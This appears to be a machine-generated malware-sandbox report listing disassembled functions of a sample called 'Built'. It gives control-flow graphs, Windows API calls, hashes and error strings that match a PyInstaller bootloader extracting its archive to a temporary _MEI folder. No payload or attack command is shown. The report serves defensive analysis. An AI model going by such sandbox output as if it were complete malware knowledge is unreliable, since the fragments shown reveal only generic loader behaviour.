                                                                                                                                                                                                                                                        control_flow_graph 331 7ff65e281950-7ff65e28198b call 7ff65e2845c0 334 7ff65e281991-7ff65e2819d1 call 7ff65e287f90 331->334 335 7ff65e281c4e-7ff65e281c72 call 7ff65e28c550 331->335 340 7ff65e281c3b-7ff65e281c3e call 7ff65e29004c 334->340 341 7ff65e2819d7-7ff65e2819e7 call 7ff65e2906d4 334->341 345 7ff65e281c43-7ff65e281c4b 340->345 346 7ff65e2819e9-7ff65e281a03 call 7ff65e294f08 call 7ff65e282910 341->346 347 7ff65e281a08-7ff65e281a24 call 7ff65e29039c 341->347 345->335 346->340 353 7ff65e281a26-7ff65e281a40 call 7ff65e294f08 call 7ff65e282910 347->353 354 7ff65e281a45-7ff65e281a5a call 7ff65e294f28 347->354 353->340 360 7ff65e281a5c-7ff65e281a76 call 7ff65e294f08 call 7ff65e282910 354->360 361 7ff65e281a7b-7ff65e281afc call 7ff65e281c80 * 2 call 7ff65e2906d4 354->361 360->340 373 7ff65e281b01-7ff65e281b14 call 7ff65e294f44 361->373 376 7ff65e281b16-7ff65e281b30 call 7ff65e294f08 call 7ff65e282910 373->376 377 7ff65e281b35-7ff65e281b4e call 7ff65e29039c 373->377 376->340 383 7ff65e281b50-7ff65e281b6a call 7ff65e294f08 call 7ff65e282910 377->383 384 7ff65e281b6f-7ff65e281b8b call 7ff65e290110 377->384 383->340 390 7ff65e281b8d-7ff65e281b99 call 7ff65e282710 384->390 391 7ff65e281b9e-7ff65e281bac 384->391 390->340 391->340 394 7ff65e281bb2-7ff65e281bb9 391->394 397 7ff65e281bc1-7ff65e281bc7 394->397 398 7ff65e281bc9-7ff65e281bd6 397->398 399 7ff65e281be0-7ff65e281bef 397->399 400 7ff65e281bf1-7ff65e281bfa 398->400 399->399 399->400 401 7ff65e281bfc-7ff65e281bff 400->401 402 7ff65e281c0f 400->402 401->402 404 7ff65e281c01-7ff65e281c04 401->404 403 7ff65e281c11-7ff65e281c24 402->403 405 7ff65e281c2d-7ff65e281c39 403->405 406 7ff65e281c26 403->406 404->402 407 7ff65e281c06-7ff65e281c09 404->407 405->340 405->397 406->405 407->402 408 7ff65e281c0b-7ff65e281c0d 407->408 408->403
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E287F90: _fread_nolock.LIBCMT ref: 00007FF65E28803A
                                                                                                                                                                                                                                                        • _fread_nolock.LIBCMT ref: 00007FF65E281A1B
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E282910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF65E281B6A), ref: 00007FF65E28295E
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                        • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                                        • Opcode ID: 935fd2eea7ebb7e39a44c0ac0c5bb94dcb31adeab0dcd688edef334786e7c957
                                                                                                                                                                                                                                                        • Instruction ID: 2955832ee81c1f26e9cabaef6cd2b7726c41183c06a2190047b33413ec606662
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 935fd2eea7ebb7e39a44c0ac0c5bb94dcb31adeab0dcd688edef334786e7c957
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4819D71A0C78686EF209B25D3446B933A1AF68784F484431F98EE778EDE7CE585C741
                                                                                                                                                                                                                                                        Function 00007FF65E281600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 409 7ff65e281600-7ff65e281611 410 7ff65e281637-7ff65e281651 call 7ff65e2845c0 409->410 411 7ff65e281613-7ff65e28161c call 7ff65e281050 409->411 418 7ff65e281653-7ff65e281681 call 7ff65e294f08 call 7ff65e282910 410->418 419 7ff65e281682-7ff65e28169c call 7ff65e2845c0 410->419 416 7ff65e28162e-7ff65e281636 411->416 417 7ff65e28161e-7ff65e281629 call 7ff65e282710 411->417 417->416 426 7ff65e2816b8-7ff65e2816cf call 7ff65e2906d4 419->426 427 7ff65e28169e-7ff65e2816b3 call 7ff65e282710 419->427 434 7ff65e2816f9-7ff65e2816fd 426->434 435 7ff65e2816d1-7ff65e2816f4 call 7ff65e294f08 call 7ff65e282910 426->435 433 7ff65e281821-7ff65e281824 call 7ff65e29004c 427->433 442 7ff65e281829-7ff65e28183b 433->442 436 7ff65e281717-7ff65e281737 call 7ff65e294f44 434->436 437 7ff65e2816ff-7ff65e28170b call 7ff65e281210 434->437 448 7ff65e281819-7ff65e28181c call 7ff65e29004c 435->448 449 7ff65e281739-7ff65e28175c call 7ff65e294f08 call 7ff65e282910 436->449 450 7ff65e281761-7ff65e28176c 436->450 445 7ff65e281710-7ff65e281712 437->445 445->448 448->433 462 7ff65e28180f-7ff65e281814 449->462 453 7ff65e281802-7ff65e28180a call 7ff65e294f30 450->453 454 7ff65e281772-7ff65e281777 450->454 453->462 455 7ff65e281780-7ff65e2817a2 call 7ff65e29039c 454->455 464 7ff65e2817da-7ff65e2817e6 call 7ff65e294f08 455->464 465 7ff65e2817a4-7ff65e2817bc call 7ff65e290adc 455->465 462->448 472 7ff65e2817ed-7ff65e2817f8 call 7ff65e282910 464->472 470 7ff65e2817c5-7ff65e2817d8 call 7ff65e294f08 465->470 471 7ff65e2817be-7ff65e2817c1 465->471 470->472 471->455 473 7ff65e2817c3 471->473 477 7ff65e2817fd 472->477 473->477 477->453
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                                        • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                                        • Opcode ID: 85a2b5521d0669672b47b55b308223b2fdea38ff8534affe5992005950969590
                                                                                                                                                                                                                                                        • Instruction ID: 5648c308de843ea297d5dc15d8658f66d1b6e2ec3ccce06f07968131715519a4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 85a2b5521d0669672b47b55b308223b2fdea38ff8534affe5992005950969590
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D9518A61A0C74782EE10AB2297405A93391BFA4794F884536FE4CE7ADEEF7CE585C700
                                                                                                                                                                                                                                                        Function 00007FF65E288660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetTempPathW.KERNEL32(?,?,00000000,00007FF65E283CBB), ref: 00007FF65E288704
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00007FF65E283CBB), ref: 00007FF65E28870A
                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00007FF65E283CBB), ref: 00007FF65E28874C
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E288830: GetEnvironmentVariableW.KERNEL32(00007FF65E28388E), ref: 00007FF65E288867
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E288830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF65E288889
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E298238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF65E298251
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E282810: MessageBoxW.USER32 ref: 00007FF65E2828EA
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                        • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                                        • Opcode ID: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                                                                                                                                                                                        • Instruction ID: aaa7ee9585c6538495acb7c5d719b46d21ceb7598e973dad5a0f05597fc87f8f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7641BE12A1D74244FE18A765AB512B93291AFA47C8F8C1132FD0DE7BDEDE3CE4418300
                                                                                                                                                                                                                                                        Function 00007FF65E281210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 601 7ff65e281210-7ff65e28126d call 7ff65e28bd80 604 7ff65e281297-7ff65e2812af call 7ff65e294f44 601->604 605 7ff65e28126f-7ff65e281296 call 7ff65e282710 601->605 610 7ff65e2812d4-7ff65e2812e4 call 7ff65e294f44 604->610 611 7ff65e2812b1-7ff65e2812cf call 7ff65e294f08 call 7ff65e282910 604->611 617 7ff65e281309-7ff65e28131b 610->617 618 7ff65e2812e6-7ff65e281304 call 7ff65e294f08 call 7ff65e282910 610->618 622 7ff65e281439-7ff65e28146d call 7ff65e28ba60 call 7ff65e294f30 * 2 611->622 621 7ff65e281320-7ff65e281345 call 7ff65e29039c 617->621 618->622 629 7ff65e28134b-7ff65e281355 call 7ff65e290110 621->629 630 7ff65e281431 621->630 629->630 637 7ff65e28135b-7ff65e281367 629->637 630->622 639 7ff65e281370-7ff65e281398 call 7ff65e28a1c0 637->639 642 7ff65e28139a-7ff65e28139d 639->642 643 7ff65e281416-7ff65e28142c call 7ff65e282710 639->643 644 7ff65e281411 642->644 645 7ff65e28139f-7ff65e2813a9 642->645 643->630 644->643 647 7ff65e2813ab-7ff65e2813b9 call 7ff65e290adc 645->647 648 7ff65e2813d4-7ff65e2813d7 645->648 654 7ff65e2813be-7ff65e2813c1 647->654 649 7ff65e2813ea-7ff65e2813ef 648->649 650 7ff65e2813d9-7ff65e2813e7 call 7ff65e2a9e30 648->650 649->639 653 7ff65e2813f5-7ff65e2813f8 649->653 650->649 656 7ff65e28140c-7ff65e28140f 653->656 657 7ff65e2813fa-7ff65e2813fd 653->657 658 7ff65e2813c3-7ff65e2813cd call 7ff65e290110 654->658 659 7ff65e2813cf-7ff65e2813d2 654->659 656->630 657->643 660 7ff65e2813ff-7ff65e281407 657->660 658->649 658->659 659->643 660->621
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                        • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                                        • Opcode ID: ab383ac4b995131bdd40696453c0f16ebeee9cffe796343d9728e2385cbc1d23
                                                                                                                                                                                                                                                        • Instruction ID: 361a7965764dfc78baa3e4ad746461db7474328e1aaed3a7052d0dcef977a902
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ab383ac4b995131bdd40696453c0f16ebeee9cffe796343d9728e2385cbc1d23
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64517822A0C74285EE60AB12A7503BA7391ABA5B94F8C5135FD4DE7AD9EE3CE541C700
                                                                                                                                                                                                                                                        Function 00007FF65E29ED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF65E29F0AA,?,?,-00000018,00007FF65E29AD53,?,?,?,00007FF65E29AC4A,?,?,?,00007FF65E295F3E), ref: 00007FF65E29EE8C
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF65E29F0AA,?,?,-00000018,00007FF65E29AD53,?,?,?,00007FF65E29AC4A,?,?,?,00007FF65E295F3E), ref: 00007FF65E29EE98
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                        • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                        • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                                        • Instruction ID: 190975a664ca8b879e9bce28240c6f52aefcaf1cdcc129ee6c34411143d0014c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5941BF31B19A1241EF158B269B0067532E5BF69BA0F8C6539FD5DE778CEE7CE4858200
                                                                                                                                                                                                                                                        Function 00007FF65E2836B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,00007FF65E283804), ref: 00007FF65E2836E1
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF65E283804), ref: 00007FF65E2836EB
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E282C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF65E283706,?,00007FF65E283804), ref: 00007FF65E282C9E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E282C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF65E283706,?,00007FF65E283804), ref: 00007FF65E282D63
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E282C50: MessageBoxW.USER32 ref: 00007FF65E282D99
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                                        • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                        • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                                        • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                                        • Instruction ID: 1aed268da54980dbcc0a3475f997841fd5111a5b9c2872efeebdc468a0c0cdb9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A9215161F1C74281FE209724EB153BA3291BFA8354F884136F69EE66DDEE6CE504C700
                                                                                                                                                                                                                                                        Function 00007FF65E29BA5C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 746 7ff65e29ba5c-7ff65e29ba82 747 7ff65e29ba84-7ff65e29ba98 call 7ff65e294ee8 call 7ff65e294f08 746->747 748 7ff65e29ba9d-7ff65e29baa1 746->748 766 7ff65e29be8e 747->766 750 7ff65e29be77-7ff65e29be83 call 7ff65e294ee8 call 7ff65e294f08 748->750 751 7ff65e29baa7-7ff65e29baae 748->751 768 7ff65e29be89 call 7ff65e29a8e0 750->768 751->750 754 7ff65e29bab4-7ff65e29bae2 751->754 754->750 755 7ff65e29bae8-7ff65e29baef 754->755 758 7ff65e29baf1-7ff65e29bb03 call 7ff65e294ee8 call 7ff65e294f08 755->758 759 7ff65e29bb08-7ff65e29bb0b 755->759 758->768 764 7ff65e29bb11-7ff65e29bb17 759->764 765 7ff65e29be73-7ff65e29be75 759->765 764->765 770 7ff65e29bb1d-7ff65e29bb20 764->770 769 7ff65e29be91-7ff65e29bea8 765->769 766->769 768->766 770->758 773 7ff65e29bb22-7ff65e29bb47 770->773 775 7ff65e29bb49-7ff65e29bb4b 773->775 776 7ff65e29bb7a-7ff65e29bb81 773->776 779 7ff65e29bb72-7ff65e29bb78 775->779 780 7ff65e29bb4d-7ff65e29bb54 775->780 777 7ff65e29bb83-7ff65e29bbab call 7ff65e29d5fc call 7ff65e29a948 * 2 776->777 778 7ff65e29bb56-7ff65e29bb6d call 7ff65e294ee8 call 7ff65e294f08 call 7ff65e29a8e0 776->778 809 7ff65e29bbc8-7ff65e29bbf3 call 7ff65e29c284 777->809 810 7ff65e29bbad-7ff65e29bbc3 call 7ff65e294f08 call 7ff65e294ee8 777->810 807 7ff65e29bd00 778->807 781 7ff65e29bbf8-7ff65e29bc0f 779->781 780->778 780->779 784 7ff65e29bc11-7ff65e29bc19 781->784 785 7ff65e29bc8a-7ff65e29bc94 call 7ff65e2a391c 781->785 784->785 788 7ff65e29bc1b-7ff65e29bc1d 784->788 796 7ff65e29bd1e 785->796 797 7ff65e29bc9a-7ff65e29bcaf 785->797 788->785 794 7ff65e29bc1f-7ff65e29bc35 788->794 794->785 799 7ff65e29bc37-7ff65e29bc43 794->799 805 7ff65e29bd23-7ff65e29bd43 ReadFile 796->805 797->796 801 7ff65e29bcb1-7ff65e29bcc3 GetConsoleMode 797->801 799->785 803 7ff65e29bc45-7ff65e29bc47 799->803 801->796 806 7ff65e29bcc5-7ff65e29bccd 801->806 803->785 808 7ff65e29bc49-7ff65e29bc61 803->808 811 7ff65e29bd49-7ff65e29bd51 805->811 812 7ff65e29be3d-7ff65e29be46 GetLastError 805->812 806->805 815 7ff65e29bccf-7ff65e29bcf1 ReadConsoleW 806->815 818 7ff65e29bd03-7ff65e29bd0d call 7ff65e29a948 807->818 808->785 819 7ff65e29bc63-7ff65e29bc6f 808->819 809->781 810->807 811->812 813 7ff65e29bd57 811->813 816 7ff65e29be63-7ff65e29be66 812->816 817 7ff65e29be48-7ff65e29be5e call 7ff65e294f08 call 7ff65e294ee8 812->817 821 7ff65e29bd5e-7ff65e29bd73 813->821 823 7ff65e29bcf3 GetLastError 815->823 824 7ff65e29bd12-7ff65e29bd1c 815->824 828 7ff65e29bcf9-7ff65e29bcfb call 7ff65e294e7c 816->828 829 7ff65e29be6c-7ff65e29be6e 816->829 817->807 818->769 819->785 827 7ff65e29bc71-7ff65e29bc73 819->827 821->818 831 7ff65e29bd75-7ff65e29bd80 821->831 823->828 824->821 827->785 835 7ff65e29bc75-7ff65e29bc85 827->835 828->807 829->818 838 7ff65e29bd82-7ff65e29bd9b call 7ff65e29b674 831->838 839 7ff65e29bda7-7ff65e29bdaf 831->839 835->785 846 7ff65e29bda0-7ff65e29bda2 838->846 842 7ff65e29bdb1-7ff65e29bdc3 839->842 843 7ff65e29be2b-7ff65e29be38 call 7ff65e29b4b4 839->843 847 7ff65e29be1e-7ff65e29be26 842->847 848 7ff65e29bdc5 842->848 843->846 846->818 847->818 850 7ff65e29bdca-7ff65e29bdd1 848->850 851 7ff65e29bdd3-7ff65e29bdd7 850->851 852 7ff65e29be0d-7ff65e29be18 850->852 853 7ff65e29bdf3 851->853 854 7ff65e29bdd9-7ff65e29bde0 851->854 852->847 856 7ff65e29bdf9-7ff65e29be09 853->856 854->853 855 7ff65e29bde2-7ff65e29bde6 854->855 855->853 858 7ff65e29bde8-7ff65e29bdf1 855->858 856->850 857 7ff65e29be0b 856->857 857->847 858->856
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
                                                                                                                                                                                                                                                        • Instruction ID: 3b3a9a25816a944e00a5cd0b7f45dcc2abe5ed9bd6c8b1f912fbded14ea25787
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32C10522A0CB8691EE609B1597402BD3B56FBA1BC0F5D2131FA4EE3799CE7CE4858714
                                                                                                                                                                                                                                                        Function 00007FF65E288570 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
